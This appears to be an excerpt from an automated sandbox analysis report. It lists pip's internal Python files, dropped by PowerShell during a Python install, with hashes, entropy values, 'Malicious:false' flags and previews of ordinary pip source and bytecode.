                                                                                                                                                                                                              Preview:.........j.e................................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z e.e.e f.....Z!e.e.e.f.....Z"e.e.e.e.f.....Z#e.e.e.e"....f.....Z$e.e.e.e#....f.....Z%e.e$e%f.....Z&e.e!e&f.....Z'd.e.e!e(f.....f.d...Z)..d.d.e!d.e.e.e*g.e(f.........d.e&f.d...Z+d.e.e.....d.e'f.d...Z,d.e.e.....d.e!d.e.e.....f.d...Z-d.e.e.....d.e!d.e.e.....f.d...Z.d.e!d.d.f.d...Z/y.).z'Validation of dependencies of packages......N)...Callable..Dict..List..NamedTuple..Optional..Set..Tuple)...Requirement)...LegacySpecifier)...NormalizedName..canonicalize_name)...LegacyVersion)..)make_distribution_for_install_requirement)...get_default_environment)...DistributionVersion)...InstallRequirement)...deprecatedc.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)...PackageDetails..version..dependenciesN)...__name__..__module__
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10131
                                                                                                                                                                                                              Entropy (8bit):5.436114230205905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:YhVFw9boYtQ3JHhpQ7EBNgtvWBUrHZKlobtlhPpRQwKEKF:YhVuFQJBpQ78CQBUrHV7hPp5zKF
                                                                                                                                                                                                              MD5:DF3888072485E5004445256050E9C80A
                                                                                                                                                                                                              SHA1:D588D4DABE19E8404A29C4D13A6ED0DCED3DE746
                                                                                                                                                                                                              SHA-256:687A6CB1F9C15EBD883C709FB1B5620641E4FDA02C8A13AB109BABD15F76166D
                                                                                                                                                                                                              SHA-512:A072B4C6CC096A25068272DD874313B207DDCCB7B28F1A22BA46D02770387C7005BA18D3395936D495D09628D15296A6FC2FCBB6D8202A605EBE70C31BBE7AE0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.eX&........................t.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z ..............d.d.e.e.e!........d.e"d.e"d.e.e.e!........d.e"d.e"d.e.e!....d.e.e!d.d.f.....f.d...Z#d.e.d.e!f.d...Z$d.e.d.e f.d...Z%..G.d...d.........Z&y.)......N)...Container..Dict..Generator..Iterable..List..NamedTuple..Optional..Set)...canonicalize_name)...Version)...BadCommand..InstallationError)...BaseDistribution..get_environment)...install_req_from_editable..install_req_from_line)...COMMENT_RE)..%direct_url_as_pep440_direct_referencec.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)..._EditableInfo..requirement..commentsN)...__name__..__module__..__qualname__..str..__annotations__r............sC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/freeze.py
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25720
                                                                                                                                                                                                              Entropy (8bit):5.256060956173821
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:zO2wKTooLdImMUGJEe5jRvrPXwXK5wfK44L7JTKRp6yLa+4JgL5WVUDuYCOY9a:ZTooJHcEkRvrXSSR3L7JTKRw7/gxD4Oj
                                                                                                                                                                                                              MD5:9847FEB1312EDED8EA41C4B44961F11A
                                                                                                                                                                                                              SHA1:832F20189BA38C733FFFC48E424E60C72CA6FBEE
                                                                                                                                                                                                              SHA-256:D4B5A639549E70083540ABD077AAAA67D50D91307E4F10661EA0DA3CF1E36EE2
                                                                                                                                                                                                              SHA-512:4ECABC9FE43EB686D9CBDD15D106230A3738F75890C328949D8B292137315F678E511EAD8DCFCAB3FFC79DD73C4FBFA45491E75D9BEEFD3C8A4F0A5E0F7C825F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.m.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;m<Z<m=Z=m>Z>..d.d.l?m@Z@..d.d.lAmBZB..d.d.lCmDZD....e1eE........ZFd.e/d.e-d.e.d.eGd.eGd e.f.d!..ZHd"e!d#eId$eJd d.f.d%..ZK..G.d&..d'........ZL....d2d"e!d(e&d)e.eI....d*e.e6....d eLf.d+..ZM..d2d"e!d)e.eI....d*e.e6....d eLf.d,..ZN....d2d"e!d#eId(e&d$eJd)e.eI....d*e.e6....d e.eL....f.d-..ZO..d3d"e!d)eId*e.e6....d.eGd e.eI....f.d/..ZP..G.d0..d1........ZQy.)4z)Prepares a distribution for installation......N)...Path)...Dict..Iterable..List..Optional)...canonicalize_name)..)make_distribution_for_install_requirement)...InstalledDistribution)...DirectoryUrlHashUnsupported..HashMismatch..HashUnpinned..InstallationError..Meta
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):220
                                                                                                                                                                                                              Entropy (8bit):4.8143839236019055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:L2/VneP8u95/n23d6oAreKAqAIiW4R6Iaatgem/l:i/VeP8g/2ImbsiDjaatHmt
                                                                                                                                                                                                              MD5:72765E8A73DCAA67DA4F86E13C18F77E
                                                                                                                                                                                                              SHA1:A7265162B247A6EE98E3D5EE9E6D4A4897B4E2EF
                                                                                                                                                                                                              SHA-256:E70E41C97EB38E2F69689E22E3B330076E81656C8EF84D1D8A11479F101E79F6
                                                                                                                                                                                                              SHA-512:5629D4BF757D564D713E801FDAEC300B3F3BFC799DFA135650D6A62D9262FDD3F3F7FF4020E2FDCF05AB035A697F4BF5DCB46349560DD956754FD277125FAD07
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................y.).N..r..........{C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/build/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7831
                                                                                                                                                                                                              Entropy (8bit):5.343355514142353
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:KAXtXwqhfCKD9C25qXtjYMxasmMk68VjN73N62FUkYQjVmhe/Y:KOXhhf/D96OM8VjtFUImhl
                                                                                                                                                                                                              MD5:F21B877C921E4395F443E8CD61E22525
                                                                                                                                                                                                              SHA1:D3BBA5A20407A9CA1FE091BFB7CB085E908B0EF9
                                                                                                                                                                                                              SHA-256:360DE17788ADDF63025C0D26612B67C6FD0E5B61E83519B2B895F64D427E7A4A
                                                                                                                                                                                                              SHA-512:E00F99E1CE610E5C9A55EC16AD9D9F338F95E013E400ECF1E2DE4137FCE369C90142EF10C8134F69814C9F3C8D71888E87864BA73FCCE9541BB281C3D86D2D69
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................&.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................e.........Z.e.j,..................d.e.d.e.d.....f.d...........Z.e.j,..................d.e.d.....f.d...........Z...G.d...d.e.........Z...G.d...d.........Z.y.)......N)...TracebackType)...Dict..Generator..Optional..Set..Type..Union)...Link)...InstallRequirement)...TempDirectory..changes..return..NNNc................+.......K.....t.........j...................}.t.................}.i.}.|.j...........................D.]...\...}.}...|.|.....|.|.<...|.|.|.<.........d.......|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..y.#.t.........$.r...|.|.|.<...Y..Tw.x.Y.w.#.|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..w.x.Y.w...w...N)...os..environ..object..items..KeyError..isinstance..str).r......targ
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1897
                                                                                                                                                                                                              Entropy (8bit):5.653573824960168
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:KCXBXWk0LhIaZjpml+L2C58Q/D2fxa1tK:/XP0VIaZja+/5n2z
                                                                                                                                                                                                              MD5:A7042E1817E21968BB50DC2C0A3B6C86
                                                                                                                                                                                                              SHA1:D6DCE99DDA015550918DDA3FEE6235EF5A8643BF
                                                                                                                                                                                                              SHA-256:3CEC6626620BC9CD6EF8E4E8E60EE1946A1D30B4AEC78A0140BF39F20F9ADD0D
                                                                                                                                                                                                              SHA-512:40D5E43BFA4C25C92240245A6D17CC41F0EA8E78BDC37C1C14CCC7C5256D831F19C055BE66A27625F52EEB5162847187E2F3123DB504EA43398DAD9FECB04A06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz#Preparing metadata (pyproject.toml))...package_detailsN).r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1931
                                                                                                                                                                                                              Entropy (8bit):5.657585458925144
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:OCXBXWk0LhIaZjpmW+H62I5D/c2Qua1tw:TXP0VIaZjx+Ho5DIQ
                                                                                                                                                                                                              MD5:83D75D024310363D7BBA899C9C0E48C5
                                                                                                                                                                                                              SHA1:DB44236929AD06D2C312332D121E00923F8E88E0
                                                                                                                                                                                                              SHA-256:88DEE3E4AB460CF9F878392D8FFACE534D313048A5F7DE151DFA57662606F250
                                                                                                                                                                                                              SHA-512:ADB2F0EDF845580D189EDFB1166CEFE81273F1E45C725ABEDF94FCE2C68F01AE0EE491089389E89F254A174DA6C7EAC0C31F244770E859F9C4F82EC7027C850D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz,Preparing editable metadata (pyproject.toml))...package_detail
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3082
                                                                                                                                                                                                              Entropy (8bit):5.679598430733228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ghRGnLcy+K9YkJPL2P042c5j5q1oFY+TpElN2CUyGv5JcgesigO3bHtq7:QwLcy+mJPL2NFY+TpgUPHcIsHu
                                                                                                                                                                                                              MD5:5A244B8CCDC1BA837CC2A12B38B8DF80
                                                                                                                                                                                                              SHA1:D61F6842A5A8119BBE30B5BE17C80BB4DCF4B285
                                                                                                                                                                                                              SHA-256:679F947E9011D8F5C26E53ACF2D26BB4875097F55EF01BEACCAD7B876F53EB62
                                                                                                                                                                                                              SHA-512:0D8BA731A4C875499B3113A6AA5557588D8DB32FB004C2E0C8706F36478AAA8B17A179213A2D21FACA4EBED39865E148334F2A5A4EE6C4349BB1DD1CA738C321
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j"..................e.........Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.d.e.d.e.d.e.f.d...Z.y.).z;Metadata generation logic for legacy source distributions.......N)...BuildEnvironment)...open_spinner)...InstallationError..InstallationSubprocessError..MetadataGenerationFailed)...make_setuptools_egg_info_args)...call_subprocess)...TempDirectory..directory..returnc.....................*.....t.........j...................|.........D...c.g.c.]...}.|.j...................d.........s...|.......}.}.|.s.t.........d.|...............t.........|.........d.kD..r.t.........d.j...................|...................t.........j...................j...................|.|.d.............S.c...c.}.w.).z.Find an .egg-info subdirectory in `directory`.z..egg-infoz No .egg-info directory found in .....z-More than one .egg-info directory found in {}r....)...os..listdir..endswith
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1698
                                                                                                                                                                                                              Entropy (8bit):5.607949285878918
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:4WsvKb7k+s4vDHvS2gkuS6aStsPP4x23Hgwr2Wyv2txl6zyDM5wt9S:WvKbwEK2F+bx2/6230zdY9S
                                                                                                                                                                                                              MD5:70E837E91D35151364A9661844601FF9
                                                                                                                                                                                                              SHA1:BC2BB7C22D04CF69B3BA1B2B5554B8A317CBC1A4
                                                                                                                                                                                                              SHA-256:0E834633F03BD6A6B6810B7A5218BBBABB1ADBA373B34BD305ACBEFBD2FCF221
                                                                                                                                                                                                              SHA-512:7BA06D716466BE23EF323F79CEDC94AB04075DE4EB78182CD85C7308D62C9B6B29414F2F69C0729C83CB04706902585CABB5D4A8E3FCA9024AE09D4F7C27E989
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e3.........................~.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc.....................R.....|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5...|.j...................|.|...........}.d.d.d...........t.........j...................j...................|...........S.#.1.s.w...Y......)x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Destination directory: %sz.Building wheel for z. (pyproject.toml)).r....z.Failed building wheel for %s)...logger..debugr......subprocess_runner..build_wheel..Exception..error..os..path..join).r
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2039
                                                                                                                                                                                                              Entropy (8bit):5.6779197230443925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YZZoPzvKzxOtG2F0PSqw2JnkUIg9qFZ0zOVw:c+b68c2CPS7PgaA
                                                                                                                                                                                                              MD5:B042C89E6288F79ABE2526E1488ECFD5
                                                                                                                                                                                                              SHA1:6742D63D210503C618F982FCE2B0A09879C8CC82
                                                                                                                                                                                                              SHA-256:79840C60C8FAA1859D6FA132280A7CDF78CBADD5580F0B37071913D62E4D2F11
                                                                                                                                                                                                              SHA-512:F300D0566C6AC07527E5D676AFAAC10EA48428A9AF8D38BB51DBF94ED2E0B3527663EAF3400B7F61F514C1847160B876209F84FEC0949D0C40755EC2452E00F6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller..HookMissing)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc...........................|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5.....|.j...................|.|...........}...d.d.d...........t.........j...................j...................|...........S.#.t.........$.r)}.t.........j...................d.|.|...........Y.d.}.~.d.d.d...........y.d.}.~.w.w.x.Y.w.#.1.s.w...Y......^x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Destination directory: %sz.Building editable for z. (pyproject.tom
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3946
                                                                                                                                                                                                              Entropy (8bit):5.628684148986529
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:feM+G3ATAZOGAb2Hy+pNjws8bQZNcfwYRQammfU+S22N57a+tPZ6ksMpIIyN7Rc3:fV3zKXUjwnaKfZR6+S2szPZrsN7cCNe
                                                                                                                                                                                                              MD5:C83D8C0D2FD2C8C26C5E59C53A9F7C0F
                                                                                                                                                                                                              SHA1:BB83996B7CA1BA4762B122C90FA4B5C6C11225A4
                                                                                                                                                                                                              SHA-256:EF066C810509F0D14450CBEE63ABFAC5E8E06CDF00CC9CEC40B3734B3F90D739
                                                                                                                                                                                                              SHA-512:FAC7C33CF734BE2220DCE817D566CC4DC6DC366282AAB1FD3996AE789EC4B6B9D8742B5788437DC03517D81EE581C594241891D43FDFDA22B1D7A92E87835FD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j...................e.........Z.d.e.e.....d.e.d.e.f.d...Z.d.e.e.....d.e.d.e.d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...open_spinner).. make_setuptools_bdist_wheel_args)...call_subprocess..format_command_args..command_args..command_output..returnc...........................t.........|.........}.d.|...d...}.|.s.|.d.z...}.|.S.t.........j...........................t.........j...................kD..r.|.d.z...}.|.S.|.j...................d.........s.|.d.z...}.|.d.|.....z...}.|.S.).z'Format command information for logging.z.Command arguments: ...z.Command output: Nonez'Command output: [use --verbose to show]z.Command output:.).r......logger..getEffectiveLevel..logging..DEBUG..endswith).r....r......command_desc..texts.... ..C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4832
                                                                                                                                                                                                              Entropy (8bit):4.618328684403838
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:IOYy0tIvdlzsjYMxasmoX2oL5QTUVan0FHPYQxai:IDywSldyiz0FHBai
                                                                                                                                                                                                              MD5:F96311DD96F1BE4BB365524BE991BE50
                                                                                                                                                                                                              SHA1:AD8A4AB522BB9F567A393CF6D0DE5ED1314CBAB7
                                                                                                                                                                                                              SHA-256:CFE1F90CE92765D05ADDD87656AE9504C639A8B6082A6963DA9E821992B92DCF
                                                                                                                                                                                                              SHA-512:D9E4F2BA33DE58F3F040D3DA293016EDB25BE0D02642F52947D0483B84E3851E644113672EA58C70123FADE9CDCE99B47239849CE0D14DE714EC1D37976FF854
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib.import hashlib.import logging.import os.from types import TracebackType.from typing import Dict, Generator, Optional, Set, Type, Union..from pip._internal.models.link import Link.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...@contextlib.contextmanager.def update_env_context_manager(**changes: str) -> Generator[None, None, None]:. target = os.environ.. # Save values from the target and change them.. non_existent_marker = object(). saved_values: Dict[str, Union[object, str]] = {}. for name, new_value in changes.items():. try:. saved_values[name] = target[name]. except KeyError:. saved_values[name] = non_existent_marker. target[name] = new_value.. try:. yield. finally:. # Restore original values in the target.. for name, original_value in saved_values.items():. if orig
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1422
                                                                                                                                                                                                              Entropy (8bit):4.6243304875946425
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Ab0HQNdptouYXrkezPAZDI8QE2jbZjpmlLCGIJtHvH5lp0y2C5FX/P66fmepkety:AnNJSkO8QLjbZjpml+VvWy2C5ocnkyE/
                                                                                                                                                                                                              MD5:39771CD0BE98EC2FA8E622FDA059FDF0
                                                                                                                                                                                                              SHA1:C816FD8F874F799A9620D92DB505598D21C82BA8
                                                                                                                                                                                                              SHA-256:F52D02503F14DD0A99797A7E672B7C1F1C14F74944E10AE760382BA990F30677
                                                                                                                                                                                                              SHA-512:578A0446D208F615FADDA5C21CAEEAF4DF744572111C6043ADE541BFC142AC6354F4DE0E24DEC4D31535F433A1A663CF661C121351DCDBCA2510D0AEAD8F8A1E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel, so we don't have to. # consider the possibility that this hook doesn't exist..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1474
                                                                                                                                                                                                              Entropy (8bit):4.593686499595817
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Ab0HQNdptouYXrkezPAEBDI8QE2jbZjpmWLCGIJtHvH5lp9E2PA57/P66fmedQkX:AnNJSkx8QLjbZjpmW+VvLE2I5ucTQkyo
                                                                                                                                                                                                              MD5:E46DA46FB32FE4B45B9961E977915B95
                                                                                                                                                                                                              SHA1:DF9F933316C1DBFE666BFB169C6DE0D2884C74E6
                                                                                                                                                                                                              SHA-256:54B2FB2EF9ED284F2AC5D854744261728B45CD4B0E488F0D352D38DF150B29EC
                                                                                                                                                                                                              SHA-512:A25E7D52711F6FC40EB819C217CE90AF874ABA5CAE67B31272941DC7D151EAA8C57FCEF62EDB1835BE2AD6EEF6DBA0283CCA732361E7F20D7C6E4A0812D4A9E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_editable_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel/editable, so we don't have to. # consider the possibility that this hook doe
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2198
                                                                                                                                                                                                              Entropy (8bit):4.514631026862264
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:AyFTclkcBb5euAi9e6qa3h48Q4UOFY+2EVi/e2CFkyz1RJ5i:AyFTxcr13C8VFY+2lGCuRO
                                                                                                                                                                                                              MD5:8D1B8A2EC71166ECC0014C332636D8E2
                                                                                                                                                                                                              SHA1:01B6632B02F1FCA9880DACF96142556D33F159BB
                                                                                                                                                                                                              SHA-256:A3E794DB502CD7BE610C2EDD96E3357C927F16AA244C84A1C96A6329A2291D9C
                                                                                                                                                                                                              SHA-512:C6314BE4C5E87A9C7A4253DFCB26163666DF242834DFB3AE0B86CA2D2127AB39B1993FAAC474B4AC0E5A49A2B13A65C1166C2B0B72C0B0B6D3F567A375460A3D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Metadata generation logic for legacy source distributions.."""..import logging.import os..from pip._internal.build_env import BuildEnvironment.from pip._internal.cli.spinners import open_spinner.from pip._internal.exceptions import (. InstallationError,. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.setuptools_build import make_setuptools_egg_info_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...def _find_egg_info(directory: str) -> str:. """Find an .egg-info subdirectory in `directory`.""". filenames = [f for f in os.listdir(directory) if f.endswith(".egg-info")].. if not filenames:. raise InstallationError(f"No .egg-info directory found in {directory}").. if len(filenames) > 1:. raise InstallationError(. "More than one .egg-info directory found in {}".format(directory). ).. return
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1075
                                                                                                                                                                                                              Entropy (8bit):4.592001270993553
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tmdptPRVjWqaS2drOX8Sq7/P6R2TBNSSREhL:CdjP2dKXIuET3pEhL
                                                                                                                                                                                                              MD5:BFD26E6B7D053BEAE312119DF6233540
                                                                                                                                                                                                              SHA1:DCD764C358F280CC9FDB2E90AB06A9686D3F21BA
                                                                                                                                                                                                              SHA-256:B13D761412C0C430BAC32AC3A2B87C92F719D631B9A889C2456CF33FE5242624
                                                                                                                                                                                                              SHA-512:04462A2559C1FDD8815BEE2762899581B620D3035BE6CDF97BD081B9901B4DE633352C8D8D8444A13D6A549C6608C3420FD9717EDC0705BB5AFAC9F98897C6B8
                                                                                                                                                                                                              Malicious:false
